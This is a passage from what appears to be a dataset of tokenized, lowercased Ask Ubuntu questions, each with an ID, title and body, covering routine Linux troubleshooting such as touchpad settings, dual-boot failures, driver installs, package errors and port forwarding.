can be achieved with the xinput utility , but as i 'm not very familiar with it , i do n't know how . anybody can help me here , or at least point me in the right direction ? this is the output of xinput on my machine : ~ > xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎜ ↳ tpps/2 ibm trackpoint id=14 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:1025 id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ integrated camera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=13 [ slave keyboard ( 3 ) ] this is the list of the trackpoint ( device 14 ) properties : ~ > xinput -- list-props 14 device 'tpps/2 ibm trackpoint ' : device enabled ( 133 ) : 1 coordinate transformation matrix ( 135 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 256 ) : 0 device accel constant deceleration ( 257 ) : 1.000000 device accel adaptive deceleration ( 258 ) : 1.000000 device accel velocity scaling ( 259 ) : 10.000000 device product id ( 250 ) : 2 , 10 device node ( 251 ) : `` /dev/input/event13 '' evdev axis inversion ( 404 ) : 0 , 0 evdev axes swap ( 406 ) : 0 axis labels ( 407 ) : `` rel x '' ( 143 ) , `` rel y '' ( 144 ) button labels ( 408 ) : `` button left '' ( 136 ) , `` button middle '' ( 137 ) , `` button right '' ( 138 ) , `` button wheel up '' ( 139 ) , `` button wheel down '' ( 140 ) , `` button horiz wheel left '' ( 141 ) , `` button horiz wheel right '' ( 142 ) evdev middle button emulation ( 409 ) : 0 evdev middle button timeout ( 410 ) : 50 evdev third button emulation ( 411 ) : 0 evdev third button emulation timeout ( 412 ) : 1000 evdev third button emulation button ( 413 ) : 3 evdev third button emulation threshold ( 414 ) : 20 evdev wheel emulation ( 415 ) : 1 evdev wheel emulation axes ( 416 ) : 6 , 7 , 4 , 5 evdev wheel emulation inertia ( 417 ) : 10 evdev wheel emulation timeout ( 418 ) : 200 evdev wheel emulation button ( 419 ) : 2 evdev drag lock buttons ( 420 ) : 0 this is the list of the touchpad ( device 12 ) properties : ~ > xinput -- list-props 12 device 'synps/2 synaptics touchpad ' : device enabled ( 133 ) : 1 coordinate transformation matrix ( 135 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 256 ) : 1 device accel constant deceleration ( 257 ) : 2.500000 device accel adaptive deceleration ( 258 ) : 1.000000 device accel velocity scaling ( 259 ) : 12.500000 synaptics edges ( 260 ) : 1726 , 4858 , 1577 , 3665 synaptics finger ( 261 ) : 25 , 30 , 256 synaptics tap time ( 262 ) : 180 synaptics tap move ( 263 ) : 192 synaptics tap durations ( 264 ) : 180 , 180 , 100 synaptics clickpad ( 265 ) : 1 synaptics tap fasttap ( 266 ) : 0 synaptics middle button timeout ( 267 ) : 0 synaptics two-finger pressure ( 268 ) : 282 synaptics two-finger width ( 269 ) : 7 synaptics scrolling distance ( 270 ) : 87 , 87 synaptics edge scrolling ( 271 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 272 ) : 1 , 0 synaptics move speed ( 273 ) : 1.000000 , 1.750000 , 0.045725 , 40.000000 synaptics edge motion pressure ( 274 ) : 30 , 160 synaptics edge motion speed ( 275 ) : 1 , 349 synaptics edge motion always ( 276 ) : 0 synaptics off ( 277 ) : 0 synaptics locked drags ( 278 ) : 0 synaptics locked drags timeout ( 279 ) : 5000 synaptics tap action ( 280 ) : 2 , 3 , 0 , 0 , 1 , 3 , 0 synaptics click action ( 281 ) : 1 , 3 , 0 synaptics circular scrolling ( 282 ) : 0 synaptics circular scrolling distance ( 283 ) : 0.100000 synaptics circular scrolling trigger ( 284 ) : 0 synaptics circular pad ( 285 ) : 0 synaptics palm detection ( 286 ) : 0 synaptics palm dimensions ( 287 ) : 10 , 200 synaptics coasting speed ( 288 ) : 20.000000 , 50.000000 synaptics pressure motion ( 289 ) : 30 , 160 synaptics pressure motion factor ( 290 ) : 1.000000 , 1.000000 synaptics resolution detect ( 291 ) : 1 synaptics grab event device ( 292 ) : 1 synaptics gestures ( 293 ) : 1 synaptics capabilities ( 294 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 295 ) : 42 , 42 synaptics area ( 296 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 297 ) : 3292 , 0 , 3397 , 0 , 0 , 0 , 0 , 0 synaptics noise cancellation ( 298 ) : 8 , 8 device product id ( 250 ) : 2 , 7 device node ( 251 ) : `` /dev/input/event6 ''
370506	how do i get root in terminal ?	i 'm trying to install git with apt-get install git it then says e : could not open lock fine /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? how do i get this ?
370509	how to setup a wifi ap hotspot with ipv6 support ?	how to setup a wifi ap ( access point mode ) hotspot , with ipv6 support ? i 've set up a hotspot according to the guide to wifi ap hotspot setup and it works fine . but via the hotspot i failed to visit ipv6 websites . how can i setup a hotspot able to share ipv6 internet access ? thanks ! further : actually i 've tried to setup ipv6 forwarding and masquerading . first enabling ipv6 forwarding : echo 1 | sudo tee net/ipv6/conf/default/forwarding then i tried to execute : sudo ip6tables -t nat -a postrouting -s 2001 : db8:0:1 : :/64 -o eth0 -j masquerade but it gave me an error : ip6tables v1.4.12 : could n't load target `masquerade ' : no such file or directory i searched through the internet but i get confused . so i 'm here for help . thanks !
370511	gaming on ubuntu - how and why ?	so i have ubuntu 13.10 on my dell inspiron 1564 which has vga compatible controller : intel corporation core processor integrated graphics controller , and i 'm not a gamer , but i want to play that old start wars games ( the old republic , galactic empire , jedi academy ) . my question is - should i use wine or vmware or virtualbox ? and why ?
370513	boot ubuntu from a bootable usb hangs on purple screen	i recently bought a laptop ( lenovo y410p ) with windows 8 pre-installed and i 'm trying to dual boot windows 8 and ubuntu 13.0 . i created a bootable usb using pendrive . then i changed the boot mode to legacy support and the boot order so it boots from the flash storage first . when i restarted the computer , i got the error message '' syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h. peter anvin et al '' and it just hung there . fair enough . after some googling i formatted my flash drive in fat format instead of fat32 . the `` syslinux ... '' error message is gone but now it hangs on a purple screen http : //imgur.com/wbdxpzn does anyone have a suggestion what to do here ? i 've looked at various posts but none of them seems to have a solution that the author confirmed it worked .
370515	autostart desktop applications without session login	i understand the idea of startup applications when starting a session ( ie how do i start a program automatically when i boot ? ) . however , i 'm trying to have desktop applications for multiple users start when the computer reboots/starts . some apps i 'm aiming for are google music manager , remote desktop server for each session , etc . how can i either have multiple user sessions launch on boot to get these apps going -or- have them launch some other way for those users ? right now i have my primary user automatically login to start its session and related apps ...
370521	ubuntu 13.10 kvm binary is deprecated , please use qemu-system-x86_64	i just upgrade from 13.04 to 13.10 and i have this issue when i run my kvm unable to complete install : 'internal error : process exited while connecting to monitor : w : kvm binary is deprecated , please use qemu-system-x86_64 instead char device redirected to /dev/pts/10 ( label charserial0 ) failed to initialize kvm : device or resource busy detail error : traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/asyncjob.py '' , line 96 , in cb_wrapper callback ( asyncjob , *args , **kwargs ) file `` /usr/share/virt-manager/virtmanager/create.py '' , line 1983 , in do_install guest.start_install ( false , meter=meter ) file `` /usr/lib/python2.7/dist-packages/virtinst/guest.py '' , line 1246 , in start_install noboot ) file `` /usr/lib/python2.7/dist-packages/virtinst/guest.py '' , line 1314 , in _create_guest dom = self.conn.createlinux ( start_xml or final_xml , 0 ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 2892 , in createlinux if ret is none : raise libvirterror ( 'virdomaincreatelinux ( ) failed ' , conn=self ) libvirterror : internal error : process exited while connecting to monitor : w : kvm binary is deprecated , please use qemu-system-x86_64 instead char device redirected to /dev/pts/8 ( label charserial0 ) failed to initialize kvm : device or resource busy
370523	a rather long question about installation/uninstall	ok so here 's the deal guys , last week i decided i want to install ubunutu again because i really missed it . ( last time i had an ubunutu was 7.somehting ) i downloaded 12.04 and isntalled it via bootable usb device . knowing how dual boots works i cleared up some space on my hard disc before hand using the windows 7 built in disc manager . during ubunutu 's installation i thought that by choosing `` install ubuntu alongside windows 7 '' will automatically just use the space i cleared before , but apperentaly it did not since that partition is still 100 % free space . on what partition is ubunutu installed when using that method ? and how can i uninstall it to re-install it back on the space i cleared up for it ? thank you very your time reading and helping !
370524	internet timeouts with tp-link tl-wn821n wireless usb stick - existing solutions dont work	i 'm running ubuntu12.04 and i 'm trying to get a tp-link tl-wn821n to work . the solution from internet timeouts with tp-link tl-wn821n v2 wireless usb stick did n't work for me . neither has anything else ... i 've installed rtl8192cu as per instructions i found elsewhere to no avail . the symptoms i am experiencing are : when i plug in the device the pc can see and connect to wireless networks fine . the network i 'm using has internet access and the signal strength is pretty strong . i ca n't ping and i ca n't browse the internet ( timeout ) . any ideas ? i 'm not sure what the next step would be or what information would be useful at this point .
370526	how can i install ubuntu on a compaq dc7900 ?	i have an hp compaq dc7900 convertible minitower from 2006 : 80gb ( 3.5â ) sata 3.0gb/s with ncq and smart iv intel core 2 duo e8500 i can install ubuntu on it from a usb stick and everything seems to work fine , but when i finish and reboot the pc , grub will be shown but when i continue i get just a black screen with a blinking cursor i tried linux mint and opensuse as well but it seems there is something forbidden in the bios . installing windows 8 works fine .
370528	control media via arduino	i want to create an application that controls the volume , play next\last , stop\play and things like this ( i do n't know what they called ) like in a keyboard . i have tried to find how to do this with python\java but i could n't find how . the main idea is ( if some-one knows what is arduino ) to connect it to my pc ( ubuntu ) and to get from it signals that gives me values and with this values to be able to change the volume and to do next song\video . thanks to any one who help : )
370529	i need to find all pictures on ubutu 13.10	is there something , i can use to find all the pictures on my pc and external hd and copy them all into one folder ?
370534	ca n't install team viewer on 13.10	i just fresh installed 13.10 , but now the teamviewer.deb file wo n't install due to an unresolvable dependency : lib32asound2 . i found a download link here but also this package wo n't install due to an unresolvable dependency : libasound2 ( = 1.0.25-4ubuntu4 ) and help ? ?
370538	script to close and reopen a program every hour , loop not working	i made a script to close teamviewer and reopen it every hour . i am now testing it every 5 seconds , but the loop is simply not working . the script is running correctly , but one time only . i need your help . # ! /bin/bash while : do echo `` hello '' killall -9 teamviewer.exe & > sample.s sleep 1 killall -9 teamviwerd & > sample.s sleep 5 teamviewer & > sample.s sleep 5 done
370540	how to install tidesdk on ubuntu	i want to install tidesdk but do n't know how . they have instructions on their wiki , but they 're confusing . i 'm using 13.10 . thanks .
370543	how can i install roland fantom-g6 via usb	on the roland pages there are only drivers wor windows and osx . how can i run it on linux ? i would like to connect it via usb and use it as external keyboard
370545	missing /home folders after installing ubuntu 13.10 over previous lvm 'd linux os	i have just installed ubuntu 13.10 onto a system that 's had various flavours of fedora , then debian on it . it has also been dual-boot with windows 7 for a couple of years . i had been using lvm with those installations so for instance when i installed debian i kept all of my original /home directories . during the ubuntu isntallation i manually set up the partitioning , setting /home to be mounted from the original lvm /home volume ( /dev/fedora/home in my case ) , making sure to not tick the `` format '' box . this worked fine for debian . after completing the installation and booting , i ca n't see any of the previous home directories . the only cause i can think is that during installation i said to encrypt my user account 's home folder . i made sure to pick a different user name to keep the original home directories intact , but something seems to have gone wrong . ubuntu did n't warn me that it was going to wipe out /home after i told it not to . any suggestions as to where my directories may have gone ?
370546	do the amd proprietary drivers even work in ubuntu 13.10/kernel 3.11 ?	i was looking at the system requirements for the latest beta proprietary driver on amd 's website and it said `` linux kernel 2.6 or above ( up to 3.10 ) '' . however the unofficial amd proprietary driver wiki ( wiki.cchtml.com ) does give instructions on how to install in ubuntu 13.10 , but 13.10 uses kernel version 3.11 . so do any of the proprietary drivers even work in 13.10 ? because if the latest beta driver does n't even support 3.11 , will previous versions do ?
370548	13.10 with raid 5 mount issues	i have installed ubuntu 13.10 onto an hp proliant microserver with a raid 5 configuration . using mdadm , it found the raid and now auto mounts when i reboot ... but ... the actual folders are n't appearing to any programs that access them , i.e. , plex , without me first going into the raid first . so the main raid drive is called data , it 's on the dock , it shows on reboot , but i have to go in for it to complete the auto mount ( i think ) my previous version , 12.something , did this fine . any ideas ? thanks
370551	ubuntu 13.10. nexus 7 is mounted as an unnamed device	i am running ubuntu 13.10. and try to get my nexus 7 connected via the usb cable . normally 13.10. should handle mtp out of the box but the tablet is shown as an unnamed device and permissions can not be detemined . connecting as a camera works fine .
370555	install of either 12.4 and/or 13.10 hand after the internet connection screen	i have attempted to install 12.4 and 13.10 on an old p-4 , xp , machine . i have tried both wireless and ethernet . however , once i have checked the box , internet conneced and update during install i lose the check in the box . i have let it run but it just hangs for hour+ . any suggestions , please . bill
370556	need help making docky work like mac dock with minimized windows	when i minimize windows with docky it looks like this http : //i.imgur.com/uwt4ssb.png but i want it to look like this http : //i.imgur.com/6z28woh.jpg
370557	problem with java-vtk while running a java-based program	while trying to open some files in a java/vtk visualization program ( called lbview ) , i faced with this error : dist : [ jar ] building jar : /home/alireza/lbview/target/lbview.jar run : [ java ] # [ java ] # a fatal error has been detected by the java runtime environment : [ java ] # [ java ] # sigsegv ( 0xb ) at pc=0x00007fa910cc50e4 , pid=3819 , tid=140364796430080 [ java ] # [ java ] # jre version : 7.0_25-b30 [ java ] # java vm : openjdk 64-bit server vm ( 23.7-b01 mixed mode linux-amd64 compressed oops ) [ java ] # problematic frame : [ java ] # c [ libvtkrenderingjava.so.5.8.0+0x940e4 ] java_vtk_vtkrenderwindow_addrenderer_12+0x24 [ java ] # [ java ] # core dump written . default location : /home/alireza/lbview/core or core.3819 [ java ] # [ java ] # an error report file with more information is saved as : [ java ] # /home/alireza/lbview/hs_err_pid3819.log [ java ] # [ java ] # if you would like to submit a bug report , please include [ java ] # instructions on how to reproduce the bug and visit : [ java ] # https : //bugs.launchpad.net/ubuntu/+source/openjdk-7/ [ java ] # the crash happened outside the java virtual machine in native code . [ java ] # see problematic frame for where to report the bug . [ java ] # [ java ] java result : 134 here is the uploaded log file/hs_err_pid3819.log any help would be fully appreciated . ps : the program owner noted this issue : note that you need to compile with java bindings on and with shared libraries . when i last did this , you had to use the development version of vtk , not the latest release . i 'm not sure if this quote helps .
370566	suddenly today , no hdmi on both ubuntu 12.04 and windows 7 . what is hda driver ?	in the past , i just plug in hdmi , then boot laptop , and i have display on tv . today my tv reads as `` no signal '' . when i go into `` sound '' on dashboard , there is no hdmi option . i do n't understand what could have changed in the past few days . i also have windows 7 on this machine , and i have same issue on there as well . in ubuntu i scanned for drivers , and it asked if i wanted to activate hda driver for dkms . i 'm not sure what that is . i googled and it looks like an audio driver . in windows , its says driver is up to date .
370567	why ubuntu 13.04 can not keep some shortcut configuration ?	normally , i like to set `` close window '' shortcut from alt+f4 to ctrl+q because it 's more convenient . but when i restart my computer my setting become alt+f4 again . how can i solve this problem ?
370568	black screen after power on the virtual machine	i installed vmware workstation 9 on ubuntu 13.04.and then i created a new virtual machine for kali linux.when i power on virtual machine , my screen turns into black and nothing happens.then i force shutdown the pc , and get back to it.i want the solution for this black screen problem . any help will be appreciated !
370569	scilab 5.4.1 is plotting blank graphs	i have worked with earlier versions of scilab without any problem in plotting graphs , but when i installed scilab 5.4.1 in linux ubuntu 12.04 it is plotting blank graphs in graphics window number 0 . can anyone help ? thanks .
370571	how can i automatically rotate/archive my bash history logs ?	i know that bash has both histsize and histfilesize variables that control how long history is saved for , and how much of it is saved . i would like to keep an archive of my history . however , if i set either of the two variables mentioned above to a very large number , it makes searching for old commands very difficult , and after enough time they might get deleted anyway . how can i automatically archive my bash history files once they get to a certain size , and is this method applicable to other log files ( such as /var/log/auth.log ) ?
370579	no network - wifi , lan , data card	my dell vostro 2520 came pre-installed with 12.04 . for a few hours everything was really good . however , later my wifi disappeared . i installed native network manager gnome and installed wicd network manager . now i have literally zero internet connectivity : no wifi , no lan , no data card ... : - ( please help me solve this . i am first time user of linux
370581	what is the right way to share a thunderbird ( v.24 ) profile between ubuntu 12.04 lts and windows 7 , and between several users ?	i have the following setup : i use ubuntu 12.04 lts as a main working system ( host ) and windows 7 running in virtualbox as a secondary system ( guest ) . i 've created a profile in mozilla thunderbird ( v.24 ) located in the folder accessible by both systems . since virtualbox uses the same user id in the host system , there are no issues related to sharing the same folder between multiple users . 1 ) i used thunderbird running on guest os ( windows ) to create the profile and to setup the mail account inside the profile . 2 ) then i created a new thunderbird profile in linux and linked it ( through profiles.ini ) to the folder with profile created at step 1 . 3 ) i made corrections to the file prefs.js according to instructions here : http : //web.archive.org/web/20050207141558/http : //texturizer.net/thunderbird/share_mail.html ( replaced windows-specific absolute path syntax with linux-specific absolute path syntax , removed lines containing `` [ profd ] '' ) . i used the following sources of information : 1 ) http : //kb.mozillazine.org/sharing_a_profile_between_windows_and_linux ; 2 ) the link mentioned previously ; 3 ) http : @ @ //ubuntuforums.org/showthread.php ? t=203524 i tested this setup under windows and linux ( i have n't tested them yet working simultaneously ) . everything seems to work fine ( currently i am keeping all my mail on the imap server , therefore all my inbox messages are not downloaded to the profile/account folder ) . questions : 1 ) my sources of information seem to be rather outdated ( see above ) . i am not sure whether editing prefs.js file was required . 2 ) it would be fine if someone who is engaged in development of thunderbird could answer my question and tell the world what is the right procedure to organize the profile sharing between several instances of thunderbird running on windows and linux ( possibly , running simultaneously ) . 3 ) what if the mail is downloaded from the imap server and stored in the profile folder ? 4 ) what if some instances of thunderbird use extensions ( lightning ) but the other do n't ? 5 ) what if some instances of thunderbird are running under different user ids ( i.e . the profile folder is shared between several users on linux systems ) ? what steps in terms of chmod / chown / chgrp are required in this case ? in my opinion all these questions need to be answered if we are going to use ubuntu touch with thunderbird on a mobile device accessing thunderbird profile stored in the cloud ( ubuntu one ? ) / nas server . ( please correct me if i am wrong ) thank you .
370582	can get my bluetooth sony vgp-bps33 working in ubuntu	içe just started with with ubuntu . everything works except my sony vgp-bps33 bluetooth mouse . any smart idea would be welcome ! tanks
370583	installing ubuntu on macbook pro 11.2/11.3	has anyone successfully installed ubuntu on the new macbook pro ( late-2013 ) ? if not , what issues have you had ? if so , did you use a tutorial , which one ?
370584	ham0 interface ?	i recently upgraded from ubuntu 13.04 to 13.10 and a new interface appears in ifconfig : ham0 with ip address 25.130.234.51 . i do n't find any information on ham0 but it seems to have something to do with wireless . however , this desktop pc does not have any such hardware installed . even more mysterious is the ip address . the normal interface is eth0 which is connected to my local lan with address range 192.168.1.* . so what is ham0 and how does it get the ip address ?
370585	i need help downloading lunix on minecraft	help ! my minecraft.jar will not run as executable
370587	ubuntu 13.10 gets stuck on boot	i have updated ( via the software updater ) ubuntu 13.04 to ubuntu 13.10 . after it had finished the installation , the system required a reboot . when i reboot and load ubuntu it will get stuck on the logo . i managed to boot into the recovery ( both console and graphics mode ) but i ca n't figure out how to repair it . i have tried a sudo update-grub , but nothing different happened . i have also tried sudo apt-get install gnome , but the same result ... i am using a dual-boot win7 + ubuntu .
370588	configure firefox to trigger package installer for .deb files	my head exploded . i packed all the pieces back in so i could tell you about how it happened . it starts out like a n00bie post , but seriously â it 's not . for the sake of brevity , i wish the story were shorter . : -\ opened firefox to dl tunesviewer.deb from sourceforge , but the dialog box suggested vlc media player as the default installer . that 's not right . that should be some sort of package installer , not vlc . ( note : is this a ff issue or an ubuntu issue ? i 'm pretty savvy , but this has me scratching my head . other google searches seem to indicate the same state of mind as others attempt to answer the same question . it 's incredibly simple , and incredibly confusing . google searches uncover similar questions back to at least 2006 . ) so in firefox i go to the helper apps tab , and .deb files is set to `` always ask . '' so i delve further . i notice as i 'm about to dl it , the dialog box reads '' firefox should open it with a package installer '' my inside voice says . when i select the choose helper application dialog box suggests recently used documents and folders , but nothing to point to a willing install helper application . ( note : these are documents and directories â not applications . the dialog box is entitled `` ... application . '' therein lies a clue . ) in a moment of brilliance , i double click the dled .deb file and get what i think is just a generic package installer dialog box . ( at this point , i had n't noticed that it was gdebi package installer that was running . that was a complete disconnect that i ca n't explain . fatigue , perhaps . ) i 'm now google searching for what to set as the default install application for .deb files . i google search `` ubuntu package installer '' and find dpkg but there 's also apt-get the waters are muddied , and i 'm feeling more lost than before . *sigh* more google searching . this url www.webupd8.org/2010/10/how-to-make-deb-files-open-with-gdebi.html got me straightened out . right click the .deb file , select the sequence and the list of recommended applications gives gdebi package installer as an option , the rain stops , the sun shines , and birds are chirping . here 's the moral of the story , presented as a feature request : when encountering this dialog box : and you 're presented with the select helper application dialog box ( note the cancel and open buttons at the bottom ) : can you also provide a `` show applications '' button somewhere similar to the choices offered when right clicking the .deb file in the desktop ? this would change the above dialog box to something like this ( note there are now three buttons at the bottom ) : more simply , can the sequence open with ... other application ... simply show the application selection dialog box instead ? regards ,
370589	how can i recognize mir runing on tablet/phone running ubuntu touch saucy salamander ?	phones and tablets behaves differently from ubuntu on desktop . so this is why mir can not be found the same way however the system with ubuntu touch saucy salamander does run on mir . there is n't any unity-system-compositor running on my system . i do see unity8 and lightdm running .
370590	how to make my ubuntu passwordless ?	i am slowly developing a disability and therefore want to remove all passwords from my system . i have no security issue , thanks for helping .
370592	how can i add a custom launcher to favourites in gnome shell ?	how can i add a custom launcher to favourites in gnome 3.8 . i would like to put a laucher for wow
370595	installing ubuntu 13.10 'saucy salamander ' on l75d-a7280 hangs on a black screen	trying to get ubuntu 13.10 to work and it will not . seen that somebody is having a similar problem , some things failing then it just hangs on a black screen ( after pressing f1 to see what it 's doing ) . my system is a toshiba satellite l75d-a7280 , and i have tried two different files that i had downloaded from ubuntu.com with no luck . my laptop came with windows 8 and following the dual-boot directions ubuntu 12.04 was installed and worked perfect , except for completely obliterating windows 8 and voiding my warranty , meaning neither toshiba nor the retail center i bought my system from can help me legally , besides giving advice ... nor can i return it to get a non-uefi based system . i really need to figure this out , i am a student and need my laptop working properly with any os i put on it . will continue searching for any information i can find .
370598	ubuntu 13.10 - rhythmbox 2.99.1 issues	when i start the rhythmbox it crashes . then i kill the process and restart it , then it works . it happens every first time i try to run rhythmbox after turn on my pc . does anybody knows something about what is causing it ? thanks !
370599	forward port to lxc guest using ufw	i am trying to forward port 2222 on my host 192.168.2.252 to a lxc guest on 10.0.3.11 . how do i do it using the ufw-framework ? in other words i want to do this but with the ufw-framework . iptables -t nat -a prerouting -i eth0 -p tcp -- dport 2222 -j dnat -- to 10.0.3.11:2222 regards , mb
370605	persistence space	this is n't a problem , but rather a request for information . is there any documentation available which explains what goes , and what does n't go , into the 'persistence ' area of a disk ? in particular , i 'm after knowing how to free space in the area as i 'm forever getting 'space shortage ' messages . the context is that i 've installed 12.04 lts on a usb3 stick with 64gb of space , using the startup disk creator . i 'm doing this because my hard disk boot sector is knackered , and i ca n't boot up windoze , so i have to run ubuntu from usb or dvd . i set the persistent area to its max size of 4gb , and it 's loaded as the volume /cow ( which got me scratching my head as to the name ) . df reports that it 's over 90 % used . i 've installed some 430mb of updates , which i 'd thought would write to the main system volume , but perhaps has gone into the persistent area . i 've also installed a few utilities which almost certainly have gone into there . the 'meta-context ' is that i 'm trying to gain control of ubuntu after a couple of years away from linux .
370610	lost windows partition reinstalling ubuntu	i updated ubuntu 13.10 and my wireless and ethernet connections stopped working . after trying to get it sorted to no avail i decided to reinstall ubuntu . i did have a dual boot with windows 8 , but it seems that when trying to reinstall the disk has been reformatted in the early stage of the installation and the windows partition has vanished . i did n't go through with the ubuntu install . but now no os is being detected on my machine ... is there any way to get back the windows partition and then reinstall ubunutu where i had the previous installation ? thanks for any help ! !
370611	tar.bz2 files -- compile or simply copy into /usr/bin ?	i have seen seemingly contradictory advice on installing software downloaded from the internet . on the one hand , people install software using the ./configure make make install combo ( such as this question . on the other hand , i have followed other advice to just download the package , unarchive , then copy into /usr/bin ( which worked for phantomjs ) . why do we have different ways to do this ? another related question is , for the second method of copying files into /usr/bin , sometimes people create a link to the files in /usr/local . what 's the difference from directly copying in to /usr/bin ?
370612	apt tries to configure postgresql each time i try to install a package	i 'm getting some strange errors lately whenever trying to apt-get install anything . here 's an example from trying to install fluidsynth . $ sudo apt-get install libfluidsynth1 reading package lists ... done building dependency tree reading state information ... done libfluidsynth1 is already the newest version . libfluidsynth1 set to manually installed . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up postgresql-9.1 ( 9.1.10-0ubuntu12.04 ) ... * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-11-03 14:21:42 est fatal : could not access private key file `` server.key '' : no such file or directory [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-9.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of postgresql : postgresql depends on postgresql-9.1 ; however : package postgresql-9.1 is not configured yet . dpkg : error processing postgresql ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : postgresql-9.1 postgresql e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm running 12.04 . what 's causing this and how do i address it ? it happens for installing lots of things , and seems to suggest i need to initialize postgresql or something . i do n't recall having fiddled with postgres , so i 'm not sure why this suddenly became problematic .
370613	cant open ubuntu after installing windows 8	i do not have much experience with the inside workings of windows or ubuntu but this is my problem . i updated my windows to windows 8 on my computer which was previously running ubuntu and windows vista . i had a grub launcher on there so i could open either windows or ubuntu after i had started the computer , but after installing the windows version my grub launcher was not there when i booted up the computer . how do i get grub ( or equivalent ) back ? i am stuck on the windows side so an answer to install from the ubuntu side will likely no work . i do not have the disc for ubuntu .
370616	lubuntu 13.10 sudenly dont want to boot anymore	i was deleting some apps and then i decide to reboot the system and then when it reboot the screen was just black and nothing else was happining ... there was no command promt or anything ... please help .
370617	keyboard and mouse not functioning at boot on 12.10 , unable to connect to ( wired ) internet	using wubi to download and install ubuntu 12.10 , everything works just fine until i boot ubuntu . it goes to the log-in screen just fine , but there both keyboard and mouse goes dead and it is unable to connect to internet ( it tries for a minute or so , then gives me an error message that says `` wired connection - disconnect from internet '' ( or something to that effect ) . i have tried several keyboards and mice to no avail - all lights on the keyboards are dead . i 'm using win7 , everything works perfectly there . to summarize : i ca n't log in due to keyboard inputs not being recognized . pointer does n't respond to mouse movement unable to connect to the internet any ideas ?
370618	i cant install nvidia drivers for gt635m on ubuntu 13.10	last night i tried to install the nvidia drivers from the official site but the .run did n't work for some reason . so after it , i tried to install them with sudo apt-get install nvidia-current and other stuff like this . when i installed the driver with the sudo command my laptop boots into black screen and i can only accses ctrl+alt+f1 function . so i had to reinstall my pc again . everything else is working correctly but i ca n't get this driver to work . and in additional drivers , i can only see the wi-fi adapter driver . also i 've tried the bumblebee thing , and it does n't work as well . how can i solve these ? i 'm using lenovo g580 i7 processor 6gb ram nvidia 635gt
370620	`` dpkg-divert : error : rename involves overwriting `protocol.txt ' with different file `protocol-precise.txt ' '' while upgrading xorg	this happen after the download of ubuntu 13.04 and i ca n't even download stuff because of this problem : root @ viktor-dator : /home/viktor # sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : xserver-common-lts-raring the following packages have been kept back : libboost-dev libboost-filesystem-dev libboost-regex-dev libboost-system-dev libboost-thread-dev 0 upgraded , 0 newly installed , 1 to remove and 5 not upgraded . 1 not fully installed or removed . after this operation , 1,646 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 264683 files and directories currently installed . ) removing xserver-common-lts-raring ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-precise.txt by xserver-common-lts-raring' dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' with different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing xserver-common-lts-raring ( -- remove ) : subprocess installed post-removal script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : xserver-common-lts-raring e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ viktor-dator : /home/viktor # output off sudo apt-get check viktor @ viktor-dator : ~ $ sudo apt-get check [ sudo ] password for viktor : reading package lists ... done building dependency tree reading state information ... done viktor @ viktor-dator : ~ $
370621	dlna issue with banshee	i 'm having some issue when trying to access to a media server via banshee ( or xbmc or rhythmbox ) . what happens is that i see only part of my media collection and it does n't update when i add more files to that . i run ubuntu saucy salamander and i have a lacie cloudbox with twonky media server . i can provide any information to debug ... thank you ! alessandro
370624	use video for wallpaper	how can i use a video as my desktop wallpaper ? i would like to have it like normal wallpaper so the icons etc . sit on top of it , just as in a static wallpaper picture . a similar question was asked at how do i set a vlc instance to run as a live wallpaper but no answer was given that support icons , for example , it seems .
370626	need japanese ime with dvorak keyboard with 13.10	i recently did a fresh install of 13.10 and enabled japanese language support . in the past this seemed to work seamlessly with my other keyboard settings when i set up my dvorak keyboard . but this time when i toggle the ime on it uses the standard qwerty layout . typing english uses the dvorak layout as i expect . this just worked for me in the past to the point where i stopped paying attention to what the underlying ime is and i do n't recall any special steps other then choosing my keyboard layout and enabling japanese . any help would be appreciated !
